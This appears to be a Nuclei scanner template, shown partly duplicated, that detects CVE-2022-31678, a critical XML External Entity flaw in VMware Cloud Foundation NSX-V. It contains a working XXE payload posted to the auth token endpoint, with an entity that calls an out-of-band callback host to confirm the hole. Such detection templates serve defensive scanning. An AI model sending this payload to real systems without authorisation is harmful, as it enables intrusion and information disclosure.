VMware Appliance Management" internal: true - raw: - | POST /api/3.0/services/auth/token HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY xxe SYSTEM "http://{{interactsh-url}}"> ]> <request> <username>&xxe;</username> <password>{{randstr}}</password> </request> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" - type: word part: body words: - "Bad Username or Credentials presented" - type: status status: - 403 # digest: 4a0a00473045022100cc2cbee0a1918dd2740eaefeba850f4045b356b00f72bc5a63d127842412384902202551996b0c9001d09cb2105d3e0b78369c53b2aa24024c2734bd5a190aa457ae:922c64590222798bb761d5b6d8e72950

id: CVE-2022-31678 info: name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE) author: daffainfo severity: critical description: | VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure. impact: | Attackers can cause denial-of-service or access sensitive information by exploiting XXE vulnerability. remediation: | Update to the latest version of VMware Cloud Foundation with patched NSX-V component. reference: - https://srcincite.io/advisories/src-2022-0022/ - https://www.vmware.com/security/advisories/VMSA-2022-0027.html - https://nvd.nist.gov/vuln/detail/cve-2022-31678 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2022-31678 cwe-id: CWE-611 epss-score: 0.83926 epss-percentile: 0.99321 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vmware product: cloud_foundation shodan-query: title:"VMware Appliance Management" fofa-query: title="VMware Appliance Management" tags: cve,cve2022,vmware,nsx,xxe,vkev flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/login.jsp" matchers: - type: word part: body words: - "VMware Appliance Management" internal: true - raw: - | POST /api/3.0/services/auth/token HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY xxe SYSTEM "http://{{interactsh-url}}"> ]> <request> <username>&xxe;</username> <password>{{randstr}}</password> </request> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" - type: word part: body words: - "Bad Username or Credentials presented" - type: status status: - 403 # digest: 4a0a00473045022100cc2cbee0a1918dd2740eaefeba850f4045b356b00f72bc5a63d127842412384902202551996b0c9001d09cb2105d3e0b78369c53b2aa24024c2734bd5a190aa457ae:922c64590222798bb761d5b6d8e72950